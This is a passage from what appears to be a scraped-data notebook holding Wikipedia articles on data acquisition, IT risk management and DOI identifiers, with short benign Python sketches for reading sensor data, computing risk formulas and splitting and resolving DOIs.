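  {"name": "Alice", "email": "alice@example.com"},
  {"name": "Bob", "phone": "+1-555-0100", "employer": "Example Corp"}
]
""")

# The union of attributes actually present across the collection.
all_keys = sorted({key for record in records for key in record})
print(all_keys)  # ['email', 'employer', 'name', 'phone']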
580 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_acquisition | Data acquisition is the process of sampling signals that measure real-world physical conditions and converting the resulting samples into digital numeric values that can be manipulated by a computer. Data acquisition systems, abbreviated by the acronyms DAS, DAQ, or DAU, typically convert analog waveforms into digital values for processing. The components of data acquisition systems include sensors that convert physical parameters to electrical signals, signal conditioning circuitry that converts the sensor signals into a form suitable for digitization, and analog-to-digital converters that convert the conditioned signals into digital values. Data acquisition applications are usually controlled by software programs developed using various general-purpose programming languages such as Assembly, BASIC, C, C++, C#, Fortran, Java, LabVIEW, Lisp, Pascal, etc. Stand-alone data acquisition systems are often called data loggers. There are also open-source software packages providing all the necessary tools to acquire data from different, typically specific, hardware equipment. These tools come from the scientific community where complex experiments require fast, flexible, and adaptable software. Those packages are usually custom-fit but more general DAQ packages like the Maximum Integrated Data Acquisition System can be easily tailored and are used in several physics experiments. In 1963, IBM produced computers that specialized in data acquisition. These include the IBM 7700 Data Acquisition System, and its successor, the IBM 1800 Data Acquisition and Control System. These expensive specialized systems were surpassed in 1974 by general-purpose S-100 computers and data acquisition cards produced by Tecmar/Scientific Solutions Inc. In 1981, IBM introduced the IBM Personal Computer and Scientific Solutions introduced the first PC data acquisition products. 1 2 3 4 5 Data acquisition begins with the physical phenomenon or physical property to be measured. Examples of this include temperature, vibration, light intensity, gas pressure, fluid flow, and force. Regardless of the type of physical property to be measured, the physical state that is to be measured must first be transformed into a unified form that can be sampled by a data acquisition system. The task of performing such transformations falls on devices called sensors. A data acquisition system is a collection of software and hardware that allows one to measure or control the physical characteristics of something in the real world. A complete data acquisition system consists of DAQ hardware, sensors and actuators, signal conditioning hardware, and a computer running DAQ software. If timing is necessary (such as for event mode DAQ systems), a separate compensated distributed timing system is required. A sensor, which is a type of transducer, is a device that converts a physical property into a corresponding electrical signal (e.g., strain gauge, thermistor). An acquisition system to measure different properties depends on the sensors that are suited to detect those properties. Signal conditioning may be necessary if the signal from the transducer is not suitable for the DAQ hardware being used. The signal may need to be filtered, shaped, or amplified in most cases. Various other examples of signal conditioning might be bridge completion, providing current or voltage excitation to the sensor, isolation, and linearization. For transmission purposes, single-ended analog signals, which are more susceptible to noise, can be converted to differential signals. Once digitized, the signal can be encoded to reduce and correct transmission errors.
DAQ hardware is what usually interfaces between the signal and a PC. It could be in the form of modules that can be connected to the computer's ports (parallel, serial, USB, etc.) or cards connected to slots (S 100 bus, AppleBus, ISA, MCA, PCI, PCI-E, etc.) in a PC motherboard or in a modular crate (CAMAC, NIM, VME). Sometimes adapters are needed, in which case an external breakout box can be used. DAQ cards often contain multiple components (multiplexer, ADC, DAC, TTL-IO, high-speed timers, RAM). These are accessible via a bus by a microcontroller, which can run small programs. A controller is more flexible than a hard-wired logic, yet cheaper than a CPU so it is permissible to block it with simple polling loops. For example: Waiting for a trigger, starting the ADC, looking up the time, waiting for the ADC to finish, move value to RAM, switch multiplexer, get TTL input, let DAC proceed with voltage ramp. Today, signals from some sensors and Data Acquisition Systems can be streamed via Bluetooth. DAQ device drivers are needed for the DAQ hardware to work with a PC. The device driver performs low-level register writes and reads on the hardware while exposing API for developing user applications in a variety of programs. Specialized DAQ software may be delivered with the DAQ hardware. Software tools used for building large-scale data acquisition systems include EPICS. Other programming environments that are used to build DAQ applications include ladder logic, Visual C , Visual Basic, LabVIEW, and MATLAB. |
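Editor's sketch (not from the scraped row): a hedged, software-side view of the acquisition loop described above. It assumes a hypothetical sensor or ADC module that streams one numeric reading per line over a serial port; the port name and baud rate are placeholders, and it uses the third-party pyserial package (pip install pyserial). Real DAQ hardware normally ships with its own vendor driver or API instead.

import time
import serial  # pyserial

PORT = "/dev/ttyUSB0"   # placeholder device path
BAUD = 9600             # placeholder baud rate

samples = []
with serial.Serial(PORT, BAUD, timeout=1) as ser:
    for _ in range(100):                      # acquire 100 samples
        raw = ser.readline().decode(errors="ignore").strip()
        if not raw:
            continue                          # read timed out, no data
        try:
            samples.append((time.time(), float(raw)))   # timestamped digital value
        except ValueError:
            pass                              # skip malformed lines
print(f"Acquired {len(samples)} samples")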
581 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_risk_management | IT risk management is the application of risk management methods to information technology in order to manage IT risk, i.e.: An IT risk management system (ITRMS) can be considered a subcomponent of a wider enterprise risk management system. 1 ITRMS also tend to be integrated into a broader information security management system (ISMS). The establishment, maintenance and continuous update of an ISMS provide a strong indication that a company is using a systematic approach for the identification, assessment and management of information security risks. 2 Different methodologies have been proposed to manage IT risks, each of them divided into processes and steps. 3 According to the Risk IT framework, 1 this encompasses not only the negative impact of operations and service delivery which can bring destruction or reduction of the value of the organization, but also the benefit enabling risk associated to missing opportunities to use technology to enable or enhance business or the IT project management for aspects like overspending or late delivery with adverse business impact. clarification needed incomprehensible sentence Because risk is strictly tied to uncertainty, decision theory should be applied to manage risk as a science, i.e. rationally making choices under uncertainty. Generally speaking, risk is the product of likelihood times impact (Risk Likelihood Impact). 4 The measure of an IT risk can determined as a product of threat, vulnerability and asset values: 5 A more current risk management framework for IT Risk would be the TIK framework: The process of risk management is an ongoing iterative process. It must be repeated indefinitely. The business environment is constantly changing and new threats and vulnerabilities emerge every day. The choice of countermeasures (controls) used to manage risks must strike a balance between productivity, cost, effectiveness of the countermeasure, and the value of the informational asset being protected. The Certified Information Systems Auditor Review Manual 2006 produced by ISACA, an international professional association focused on IT Governance, provides the following definition of risk management: "Risk management is the process of identifying vulnerabilities and threats to the information resources used by an organization in achieving business objectives, and deciding what countermeasures, if any, to take in reducing risk to an acceptable level, based on the value of the information resource to the organization. 6 Risk management is the process that allows IT managers to balance the operational and economic costs of protective measures and achieve gains in mission capability by protecting the IT systems and data that support their organizations’ missions. This process is not unique to the IT environment; indeed it pervades decision-making in all areas of our daily lives. 7 The head of an organizational unit must ensure that the organization has the capabilities needed to accomplish its mission. These mission owners must determine the security capabilities that their IT systems must have to provide the desired level of mission support in the face of real world threats. Most organizations have tight budgets for IT security; therefore, IT security spending must be reviewed as thoroughly as other management decisions. 
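Editor's note: the operator symbols in the two risk formulas above were stripped by the cleaning regex. Restated, they are Risk = Likelihood x Impact and Risk = Threat x Vulnerability x Asset value. A tiny sketch with purely illustrative numbers:

def risk_from_likelihood(likelihood: float, impact: float) -> float:
    # Risk = Likelihood x Impact
    return likelihood * impact

def risk_from_factors(threat: float, vulnerability: float, asset_value: float) -> float:
    # Risk = Threat x Vulnerability x Asset value
    return threat * vulnerability * asset_value

print(risk_from_likelihood(0.2, 50_000))     # e.g. 20% chance of a 50k loss
print(risk_from_factors(0.5, 0.4, 100_000))  # illustrative factor values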
A well-structured risk management methodology, when used effectively, can help management identify appropriate controls for providing the mission-essential security capabilities. 7 Risk management in the IT world is quite a complex, multi faced activity, with a lot of relations with other complex activities. The picture to the right shows the relationships between different related terms. The American National Information Assurance Training and Education Center defines risk management in the IT field as: 8 Some organizations have and many others should have a comprehensive Enterprise risk management (ERM) in place. The four objective categories addressed, according to Committee of Sponsoring Organizations of the Treadway Commission (COSO) are: According to the Risk IT framework by ISACA, 9 IT risk is transversal to all four categories. The IT risk should be managed in the framework of Enterprise risk management: Risk appetite and Risk sensitivity of the whole enterprise should guide the IT risk management process. ERM should provide the context and business objectives to IT risk management Whilst a methodology does not describe specific methods; nevertheless it does specify several processes (constitute a generic framework) that need to be followed. These processes may be broken down in sub-processes, they may be combined, or their sequence may change. A risk management exercise must carry out these processes in one form or another, The following table compares the processes foreseen by three leading standards. 3 The ISACA Risk IT framework is more recent. The Risk IT Practitioner-Guide 10 compares Risk IT and ISO 27005. The term methodology means an organized set of principles and rules that drive action in a particular field of knowledge. 3 The overall comparison is illustrated in the following table. RE2 process includes: In general, the elements as described in the ISO 27005 process are all included in Risk IT; however, some are structured and named differently. Due to the probabilistic nature and the need of cost benefit analysis, IT risks are managed following a process that according to NIST SP 800 30 can be divided in the following steps: 7 Effective risk management must be totally integrated into the Systems Development Life Cycle. 7 Information risk analysis conducted on applications, computer installations, networks and systems under development should be undertaken using structured methodologies. 11 This step is the first step in ISO ISO IEC 27005 framework. Most of the elementary activities are foreseen as the first sub process of Risk assessment according to NIST SP 800 30. This step implies the acquisition of all relevant information about the organization and the determination of the basic criteria, purpose, scope and boundaries of risk management activities and the organization in charge of risk management activities. The purpose is usually the compliance with legal requirements and provide evidence of due diligence supporting an ISMS that can be certified. The scope can be an incident reporting plan, a business continuity plan. Another area of application can be the certification of a product. Criteria include the risk evaluation, risk acceptance and impact evaluation criteria. These are conditioned by: 12 Establishing the scope and boundaries, the organization should be studied: its mission, its values, its structure; its strategy, its locations and cultural environment. 
The constraints (budgetary, cultural, political, technical) of the organization are to be collected and documented as guide for next steps. The set up of the organization in charge of risk management is foreseen as partially fulfilling the requirement to provide the resources needed to establish, implement, operate, monitor, review, maintain and improve an ISMS. 13 The main roles inside this organization are: 7 Risk Management is a recurrent activity that deals with the analysis, planning, implementation, control, and monitoring of implemented measurements and the enforced security policy. On the contrary, Risk Assessment is executed at discrete time points (e.g. once a year, on demand, etc.) and until the performance of the next assessment provides a temporary view of assessed risks and while parameterizing the entire Risk Management process. This view of the relationship of Risk Management to Risk Assessment is depicted in figure as adopted from OCTAVE. 2 Risk assessment is often conducted in more than one iteration, the first being a high-level assessment to identify high risks, while the other iterations detailed the analysis of the major risks and other risks. According to National Information Assurance Training and Education Center risk assessment in the IT field is: 8 Risk assessment receives as input the output of the previous step Context establishment; the output is the list of assessed risks prioritized according to risk evaluation criteria. The process can be divided into the following steps: 12 The following table compares these ISO 27005 processes with Risk IT framework processes: 10 The ISO IEC 27002:2005 Code of practice for information security management recommends the following be examined during a risk assessment: Risk identification states what could cause a potential loss; the following are to be identified: 12 The output of sub process is made up of: There are two methods of risk assessment in information security field, quantitative and qualitative. 14 Purely quantitative risk assessment is a mathematical calculation based on security metrics on the asset (system or application). For each risk scenario, taking into consideration the different risk factors a Single loss expectancy (SLE) is determined. Then, considering the probability of occurrence on a given period basis, for example the annual rate of occurrence (ARO), the Annualized Loss Expectancy is determined as the product of ARO and SLE. 5 It is important to point out that the values of assets to be considered are those of all involved assets, not only the value of the directly affected resource. For example, if you consider the risk scenario of a Laptop theft threat, you should consider the value of the data (a related asset) contained in the computer and the reputation and liability of the company (other assets) deriving from the loss of availability and confidentiality of the data that could be involved. It is easy to understand that intangible assets (data, reputation, liability) can be worth much more than physical resources at risk (the laptop hardware in the example). 15 Intangible asset value can be huge, but is not easy to evaluate: this can be a consideration against a pure quantitative approach. 
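Editor's sketch of the quantitative calculation described above, ALE = ARO x SLE, using the laptop-theft scenario from the text. All asset values and the occurrence rate are made up for illustration; note how the related intangible assets dominate the total, as the passage argues.

laptop_hardware = 1_500
data_on_laptop = 40_000          # related asset: the data it holds
reputation_liability = 60_000    # related assets: reputation and liability

sle = laptop_hardware + data_on_laptop + reputation_liability  # single loss expectancy
aro = 0.05                       # annual rate of occurrence (one theft per 20 years)
ale = aro * sle                  # annualized loss expectancy
print(f"SLE = {sle}, ALE = {ale}")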
16 Qualitative risk assessment (three to five steps evaluation, from Very High to Low) is performed when the organization requires a risk assessment be performed in a relatively short time or to meet a small budget, a significant quantity of relevant data is not available, or the persons performing the assessment don't have the sophisticated mathematical, financial, and risk assessment expertise required. 14 Qualitative risk assessment can be performed in a shorter period of time and with less data. Qualitative risk assessments are typically performed through interviews of a sample of personnel from all relevant groups within an organization charged with the security of the asset being assessed. Qualitative risk assessments are descriptive versus measurable. Usually a qualitative classification is done followed by a quantitative evaluation of the highest risks to be compared to the costs of security measures. Risk estimation has as input the output of risk analysis and can be split in the following steps: The output is the list of risks with value levels assigned. It can be documented in a risk register. Risks arising from security threats and adversary attacks may be particularly difficult to estimate. This difficulty is made worse because, at least for any IT system connected to the Internet, any adversary with intent and capability may attack because physical closeness or access is not necessary. Some initial models have been proposed for this problem. 17 During risk estimation there are generally three values of a given asset, one for the loss of one of the CIA properties: Confidentiality, Integrity, Availability. 18 The risk evaluation process receives as input the output of risk analysis process. It compares each risk level against the risk acceptance criteria and prioritise the risk list with risk treatment indications. To determine the likelihood of a future adverse event, threats to an IT system must be in conjunction with the potential vulnerabilities and the controls in place for the IT system. Impact refers to the magnitude of harm that could be caused by a threat's exercise of vulnerability. The level of impact is governed by the potential mission impacts and produces a relative value for the IT assets and resources affected (e.g., the criticality sensitivity of the IT system components and data). The risk assessment methodology encompasses nine primary steps: 7 Risk mitigation, the second process according to SP 800 30, the third according to ISO 27005 of risk management, involves prioritizing, evaluating, and implementing the appropriate risk-reducing controls recommended from the risk assessment process. Because the elimination of all risk is usually impractical or close to impossible, it is the responsibility of senior management and functional and business managers to use the least-cost approach and implement the most appropriate controls to decrease mission risk to an acceptable level, with minimal adverse impact on the organization's resources and mission. The risk treatment process aim at selecting security measures to: risk and produce a risk treatment plan, that is the output of the process with the residual risks subject to the acceptance of management. There are some list to select appropriate security measures, 13 but is up to the single organization to choose the most appropriate one according to its business strategy, constraints of the environment and circumstances. The choice should be rational and documented. 
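Editor's sketch of the qualitative approach described at the start of this passage: likelihood and impact are rated on a small ordinal scale and combined through a lookup matrix instead of a calculation. The scale and matrix below are illustrative and not taken from any particular standard.

LEVELS = ["Low", "Medium", "High"]
MATRIX = {
    ("Low", "Low"): "Low",       ("Low", "Medium"): "Low",        ("Low", "High"): "Medium",
    ("Medium", "Low"): "Low",    ("Medium", "Medium"): "Medium",  ("Medium", "High"): "High",
    ("High", "Low"): "Medium",   ("High", "Medium"): "High",      ("High", "High"): "High",
}

def qualitative_risk(likelihood: str, impact: str) -> str:
    # Look up the combined rating for an ordinal likelihood/impact pair.
    return MATRIX[(likelihood, impact)]

print(qualitative_risk("Medium", "High"))   # -> "High"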
The importance of accepting a risk that is too costly to reduce is very high and led to the fact that risk acceptance is considered a separate process. 12 Risk transfer apply were the risk has a very high impact but is not easy to reduce significantly the likelihood by means of security controls: the insurance premium should be compared against the mitigation costs, eventually evaluating some mixed strategy to partially treat the risk. Another option is to outsource the risk to somebody more efficient to manage the risk. 19 Risk avoidance describe any action where ways of conducting business are changed to avoid any risk occurrence. For example, the choice of not storing sensitive information about customers can be an avoidance for the risk that customer data can be stolen. The residual risks, i.e. the risk remaining after risk treatment decision have been taken, should be estimated to ensure that sufficient protection is achieved. If the residual risk is unacceptable, the risk treatment process should be iterated. Risk mitigation is a systematic methodology used by senior management to reduce mission risk. 7 Risk mitigation can be achieved through any of the following risk mitigation options: Address the greatest risks and strive for sufficient risk mitigation at the lowest cost, with minimal impact on other mission capabilities: this is the suggestion contained in 7 Risk communication is a horizontal process that interacts bidirectionally with all other processes of risk management. Its purpose is to establish a common understanding of all aspect of risk among all the organization's stakeholder. Establishing a common understanding is important, since it influences decisions to be taken. The Risk Reduction Overview method 20 is specifically designed for this process. It presents a comprehensible overview of the coherence of risks, measures and residual risks to achieve this common understanding. Risk management is an ongoing, never ending process. Within this process implemented security measures are regularly monitored and reviewed to ensure that they work as planned and that changes in the environment rendered them ineffective. Business requirements, vulnerabilities and threats can change over the time. Regular audits should be scheduled and should be conducted by an independent party, i.e. somebody not under the control of whom is responsible for the implementations or daily management of ISMS. Security controls should be validated. Technical controls are possible complex systems that are to tested and verified. The hardest part to validate is people knowledge of procedural controls and the effectiveness of the real application in daily business of the security procedures. 7 Vulnerability assessment, both internal and external, and Penetration test are instruments for verifying the status of security controls. Information technology security audit is an organizational and procedural control with the aim of evaluating security. The IT systems of most organization are evolving quite rapidly. Risk management should cope with these changes through change authorization after risk re evaluation of the affected systems and processes and periodically review the risks and mitigation actions. 5 Monitoring system events according to a security monitoring strategy, an incident response plan and security validation and metrics are fundamental activities to assure that an optimal level of security is obtained. 
It is important to monitor the new vulnerabilities, apply procedural and technical security controls like regularly updating software, and evaluate other kinds of controls to deal with zero-day attacks. The attitude of involved people to benchmark against best practice and follow the seminars of professional associations in the sector are factors to assure the state of art of an organization IT risk management practice. Effective risk management must be totally integrated into the SDLC. An IT system's SDLC has five phases: initiation, development or acquisition, implementation, operation or maintenance, and disposal. The risk management methodology is the same regardless of the SDLC phase for which the assessment is being conducted. Risk management is an iterative process that can be performed during each major phase of the SDLC. 7 NIST SP 800 64 21 is devoted to this topic. Early integration of security in the SDLC enables agencies to maximize return on investment in their security programs, through: 21 This guide 21 focuses on the information security components of the SDLC. First, descriptions of the key security roles and responsibilities that are needed in most information system developments are provided. Second, sufficient information about the SDLC is provided to allow a person who is unfamiliar with the SDLC process to understand the relationship between information security and the SDLC. The document integrates the security steps into the linear, sequential (a.k.a. waterfall) SDLC. The five-step SDLC cited in the document is an example of one method of development and is not intended to mandate this methodology. Lastly, SP 800 64 provides insight into IT projects and initiatives that are not as clearly defined as SDLC-based developments, such as service-oriented architectures, cross-organization projects, and IT facility developments. Security can be incorporated into information systems acquisition, development and maintenance by implementing effective security practices in the following areas. 22 Information systems security begins with incorporating security into the requirements process for any new application or system enhancement. Security should be designed into the system from the beginning. Security requirements are presented to the vendor during the requirements phase of a product purchase. Formal testing should be done to determine whether the product meets the required security specifications prior to purchasing the product. Correct processing in applications is essential in order to prevent errors and to mitigate loss, unauthorized modification or misuse of information. Effective coding techniques include validating input and output data, protecting message integrity using encryption, checking for processing errors, and creating activity logs. Applied properly, cryptographic controls provide effective mechanisms for protecting the confidentiality, authenticity and integrity of information. An institution should develop policies on the use of encryption, including proper key management. Disk Encryption is one way to protect data at rest. Data in transit can be protected from alteration and unauthorized viewing using SSL certificates issued through a Certificate Authority that has implemented a Public Key Infrastructure. System files used by applications must be protected in order to ensure the integrity and stability of the application. 
Using source code repositories with version control, extensive testing, production back-off plans, and appropriate access to program code are some effective measures that can be used to protect an application's files. Security in development and support processes is an essential part of a comprehensive quality assurance and production control process, and would usually involve training and continuous oversight by the most experienced staff. Applications need to be monitored and patched for technical vulnerabilities. Procedures for applying patches should include evaluating the patches to determine their appropriateness, and whether or not they can be successfully removed in case of a negative impact. Risk management as a scientific methodology has been criticized as being shallow. 3 Major IT risk management programmes for large organizations, such as mandated by the US Federal Information Security Management Act, have been criticized. By avoiding the complexity that accompanies the formal probabilistic model of risks and uncertainty, risk management looks more like a process that attempts to guess rather than formally predict the future on the basis of statistical evidence. It is highly subjective in assessing the value of assets, the likelihood of threats occurrence and the significance of the impact. However, a better way to deal with the subject has not emerged. 3 It is quite hard to list most of the methods that at least partially support the IT risk management process. Efforts in this direction were done by: Enisa report 2 classified the different methods regarding completeness, free availability, tool support; the result is that: The Factor Analysis of Information Risk (FAIR) main document, "An Introduction to Factor Analysis of Information Risk (FAIR) , Risk Management Insight LLC, November 2006; 16 outline that most of the methods above lack of rigorous definition of risk and its factors. FAIR is not another methodology to deal with risk management, but it complements existing methodologies. 27 FAIR has had a good acceptance, mainly by The Open Group and ISACA. ISACA developed a methodology, called Risk IT, to address various kind of IT related risks, chiefly security related risks. It is integrated with COBIT, a general framework to manage IT. Risk IT has a broader concept of IT risk than other methodologies, it encompasses not just only the negative impact of operations and service delivery which can bring destruction or reduction of the value of the organization, but also the benefit value enabling risk associated to missing opportunities to use technology to enable or enhance business or the IT project management for aspects like overspending or late delivery with adverse business impact. 1 The "Build Security In" initiative of Homeland Security Department of United States, cites FAIR. 28 The initiative Build Security In is a collaborative effort that provides practices, tools, guidelines, rules, principles, and other resources that software developers, architects, and security practitioners can use to build security into software in every phase of its development. So it chiefly address Secure coding. In 2016, Threat Sketch launched an abbreviated cyber security risk assessment specifically for small organizations. 29 30 The methodology uses real options to forecast and prioritize a fixed list of high-level threats. 
The DoCRA Council developed The Duty of Care Risk Analysis (DoCRA) standard which provides principles and methods to analyze risk, based on an organization's mission, objectives, and obligations. DoCRA addresses the likelihood and impact of those risks on all parties, and whether safeguards appropriately protect others from harm while presenting a reasonable burden the business. The DoCRA methodology has been used by a number of state attorneys in data breach litigation 31 to determine settlements. In the US, data and privacy legislation continue to evolve to focus on 'reasonable security' for sensitive information risk management. The goal is to ensure organizations establish their duty of care when it comes to managing data. Businesses are responsible to understand their risk posture to prevent foreseeable harm reasonable safeguards based on their specific working environment. There are a number of standards about IT risk and IT risk management. For a description see the main article. |
582 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Doi_(identifier) | A digital object identifier (DOI) is a persistent identifier or handle used to uniquely identify various objects, standardized by the International Organization for Standardization (ISO). 1 DOIs are an implementation of the Handle System; 2 3 they also fit within the URI system (Uniform Resource Identifier). They are widely used to identify academic, professional, and government information, such as journal articles, research reports, data sets, and official publications. A DOI aims to resolve to its target, the information object to which the DOI refers. This is achieved by binding the DOI to metadata about the object, such as a URL where the object is located. Thus, by being actionable and interoperable, a DOI differs from ISBNs or ISRCs which are identifiers only. The DOI system uses the indecs Content Model for representing metadata. The DOI for a document remains fixed over the lifetime of the document, whereas its location and other metadata may change. Referring to an online document by its DOI should provide a more stable link than directly using its URL. But if its URL changes, the publisher must update the metadata for the DOI to maintain the link to the URL. 4 5 6 It is the publisher's responsibility to update the DOI database. If they fail to do so, the DOI resolves to a dead link, leaving the DOI useless. 7 The developer and administrator of the DOI system is the International DOI Foundation (IDF), which introduced it in 2000. 8 Organizations that meet the contractual obligations of the DOI system and are willing to pay to become a member of the system can assign DOIs. 9 The DOI system is implemented through a federation of registration agencies coordinated by the IDF. 10 By late April 2011 more than 50 million DOI names had been assigned by some 4,000 organizations, 11 and by April 2013 this number had grown to 85 million DOI names assigned through 9,500 organizations citation needed . A DOI is a type of Handle System handle, which takes the form of a character string divided into two parts, a prefix and a suffix, separated by a slash. The prefix identifies the registrant of the identifier and the suffix is chosen by the registrant and identifies the specific object associated with that DOI. Most legal Unicode characters are allowed in these strings, which are interpreted in a case-insensitive manner. The prefix usually takes the form 10.NNNN, where NNNN is a number greater than or equal to 1000, whose limit depends only on the total number of registrants. 12 13 The prefix may be further subdivided with periods, like 10.NNNN.N. 14 For example, in the DOI name 10.1000 182, the prefix is 10.1000 and the suffix is 182. The "10" part of the prefix distinguishes the handle as part of the DOI namespace, as opposed to some other Handle System namespace, A and the characters 1000 in the prefix identify the registrant; in this case the registrant is the International DOI Foundation itself. 182 is the suffix, or item ID, identifying a single object (in this case, the latest version of the DOI Handbook). DOI names can identify creative works (such as texts, images, audio or video items, and software) in both electronic and physical forms, performances, and abstract works 15 such as licenses, parties to a transaction, etc. 
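Editor's sketch splitting a DOI into the prefix and suffix described above. The example DOI is 10.1000/182 from the text (the "/" separator was stripped by the cleaning regex in the scraped copy); the regex pattern is an illustrative assumption, not the official DOI grammar.

import re

def split_doi(doi: str):
    # prefix: "10." plus the registrant code (digits, possibly dotted);
    # suffix: everything after the first "/"
    m = re.match(r"^(10\.[0-9.]+)/(.+)$", doi)
    if not m:
        raise ValueError(f"Not a DOI: {doi!r}")
    return m.group(1), m.group(2)

print(split_doi("10.1000/182"))   # ('10.1000', '182')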
The names can refer to objects at varying levels of detail: thus DOI names can identify a journal, an individual issue of a journal, an individual article in the journal, or a single table in that article. The choice of level of detail is left to the assigner, but in the DOI system it must be declared as part of the metadata that is associated with a DOI name, using a data dictionary based on the indecs Content Model. The official DOI Handbook explicitly states that DOIs should be displayed on screens and in print in the format doi:10.1000 182. 16 Contrary to the DOI Handbook, CrossRef, a major DOI registration agency, recommends displaying a URL (for example, https: doi.org 10.1000 182) instead of the officially specified format (for example, doi:10.1000 182) 17 18 This URL is persistent (there is a contract that ensures persistence in the DOI.ORG domain), so it is a PURL—providing the location of an HTTP proxy server which will redirect web accesses to the correct online location of the linked item. 9 19 The CrossRef recommendation is primarily based on the assumption that the DOI is being displayed without being hyperlinked to its appropriate URL—the argument being that without the hyperlink it is not as easy to copy-and-paste the full URL to actually bring up the page for the DOI, thus the entire URL should be displayed, allowing people viewing the page containing the DOI to copy-and-paste the URL, by hand, into a new window tab in their browser in order to go to the appropriate page for the document the DOI represents. 20 Since DOI is a namespace within the Handle System, it is semantically correct to represent it as the URI info:doi 10.1000 182. Major content of the DOI system currently includes: In the Organisation for Economic Co-operation and Development's publication service OECD iLibrary, each table or graph in an OECD publication is shown with a DOI name that leads to an Excel file of data underlying the tables and graphs. Further development of such services is planned. 22 Other registries include Crossref and the multilingual European DOI Registration Agency (mEDRA). 23 Since 2015, RFCs can be referenced as doi:10.17487 rfc.... 24 The IDF designed the DOI system to provide a form of persistent identification, in which each DOI name permanently and unambiguously identifies the object to which it is associated (although when the publisher of a journal changes, sometimes all the DOIs will be changed, with the old DOIs no longer working). It also associates metadata with objects, allowing it to provide users with relevant pieces of information about the objects and their relationships. Included as part of this metadata are network actions that allow DOI names to be resolved to web locations where the objects they describe can be found. To achieve its goals, the DOI system combines the Handle System and the indecs Content Model with a social infrastructure. The Handle System ensures that the DOI name for an object is not based on any changeable attributes of the object such as its physical location or ownership, that the attributes of the object are encoded in its metadata rather than in its DOI name, and that no two objects are assigned the same DOI name. Because DOI names are short character strings, they are human-readable, may be copied and pasted as text, and fit into the URI specification. 
The DOI name-resolution mechanism acts behind the scenes, so that users communicate with it in the same way as with any other web service; it is built on open architectures, incorporates trust mechanisms, and is engineered to operate reliably and flexibly so that it can be adapted to changing demands and new applications of the DOI system. 25 DOI name-resolution may be used with OpenURL to select the most appropriate among multiple locations for a given object, according to the location of the user making the request. 26 However, despite this ability, the DOI system has drawn criticism from librarians for directing users to non-free copies of documents, that would have been available for no additional fee from alternative locations. 27 The indecs Content Model as used within the DOI system associates metadata with objects. A small kernel of common metadata is shared by all DOI names and can be optionally extended with other relevant data, which may be public or restricted. Registrants may update the metadata for their DOI names at any time, such as when publication information changes or when an object moves to a different URL. The International DOI Foundation (IDF) oversees the integration of these technologies and operation of the system through a technical and social infrastructure. The social infrastructure of a federation of independent registration agencies offering DOI services was modelled on existing successful federated deployments of identifiers such as GS1 and ISBN. A DOI name differs from commonly used Internet pointers to material, such as the Uniform Resource Locator (URL), in that it identifies an object itself as a first-class entity, rather than the specific place where the object is located at a certain time. It implements the Uniform Resource Identifier (Uniform Resource Name) concept and adds to it a data model and social infrastructure. 28 A DOI name also differs from standard identifier registries such as the ISBN, ISRC, etc. The purpose of an identifier registry is to manage a given collection of identifiers, whereas the primary purpose of the DOI system is to make a collection of identifiers actionable and interoperable, where that collection can include identifiers from many other controlled collections. 29 The DOI system offers persistent, semantically interoperable resolution to related current data and is best suited to material that will be used in services outside the direct control of the issuing assigner (e.g., public citation or managing content of value). It uses a managed registry (providing both social and technical infrastructure). It does not assume any specific business model for the provision of identifiers or services and enables other existing services to link to it in defined ways. Several approaches for making identifiers persistent have been proposed. The comparison of persistent identifier approaches is difficult because they are not all doing the same thing. Imprecisely referring to a set of schemes as "identifiers" does not mean that they can be compared easily. Other "identifier systems" may be enabling technologies with low barriers to entry, providing an easy to use labeling mechanism that allows anyone to set up a new instance (examples include Persistent Uniform Resource Locator (PURL), URLs, Globally Unique Identifiers (GUIDs), etc.), but may lack some of the functionality of a registry-controlled scheme and will usually lack accompanying metadata in a controlled scheme. 
The DOI system does not have this approach and should not be compared directly to such identifier schemes. Various applications using such enabling technologies with added features have been devised that meet some of the features offered by the DOI system for specific sectors (e.g., ARK). A DOI name does not depend on the object's location and, in this way, is similar to a Uniform Resource Name (URN) or PURL but differs from an ordinary URL. URLs are often used as substitute identifiers for documents on the Internet although the same document at two different locations has two URLs. By contrast, persistent identifiers such as DOI names identify objects as first class entities: two instances of the same object would have the same DOI name. DOI name resolution is provided through the Handle System, developed by Corporation for National Research Initiatives, and is freely available to any user encountering a DOI name. Resolution redirects the user from a DOI name to one or more pieces of typed data: URLs representing instances of the object, services such as e-mail, or one or more items of metadata. To the Handle System, a DOI name is a handle, and so has a set of values assigned to it and may be thought of as a record that consists of a group of fields. Each handle value must have a data type specified in its type field, which defines the syntax and semantics of its data. While a DOI persistently and uniquely identifies the object to which it is assigned, DOI resolution may not be persistent, due to technical and administrative issues. To resolve a DOI name, it may be input to a DOI resolver, such as doi.org. Another approach, which avoids typing or cutting-and-pasting into a resolver is to include the DOI in a document as a URL which uses the resolver as an HTTP proxy, such as https: doi.org (preferred) 30 or http: dx.doi.org , both of which support HTTPS. For example, the DOI 10.1000 182 can be included in a reference or hyperlink as https: doi.org 10.1000 182. This approach allows users to click on the DOI as a normal hyperlink. Indeed, as previously mentioned, this is how CrossRef recommends that DOIs always be represented (preferring HTTPS over HTTP), so that if they are cut-and-pasted into other documents, emails, etc., they will be actionable. Other DOI resolvers and HTTP Proxies include the Handle System and PANGAEA. At the beginning of the year 2016, a new class of alternative DOI resolvers was started by http: doai.io. This service is unusual in that it tries to find a non-paywalled (often author archived) version of a title and redirects the user to that instead of the publisher's version. 31 32 Since then, other open-access favoring DOI resolvers have been created, notably https: oadoi.org in October 2016 33 (later Unpaywall). While traditional DOI resolvers solely rely on the Handle System, alternative DOI resolvers first consult open access resources such as BASE (Bielefeld Academic Search Engine). 31 33 An alternative to HTTP proxies is to use one of a number of add-ons and plug-ins for browsers, thereby avoiding the conversion of the DOIs to URLs, 34 which depend on domain names and may be subject to change, while still allowing the DOI to be treated as a normal hyperlink. A disadvantage of this approach for publishers is that, at least at present, most users will be encountering the DOIs in a browser, mail reader, or other software which does not have one of these plug-ins installed. 
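Editor's sketch of resolving a DOI through the https://doi.org/ proxy described above, using the requests library already imported in this notebook. requests follows the redirect chain, so the final response URL is the publisher's current landing page; network access is required, and the example DOI is the one from the text.

import requests

def resolve_doi(doi: str, timeout: int = 10) -> str:
    # Ask the doi.org HTTP proxy to redirect to the object's current location.
    response = requests.get(f"https://doi.org/{doi}", timeout=timeout, allow_redirects=True)
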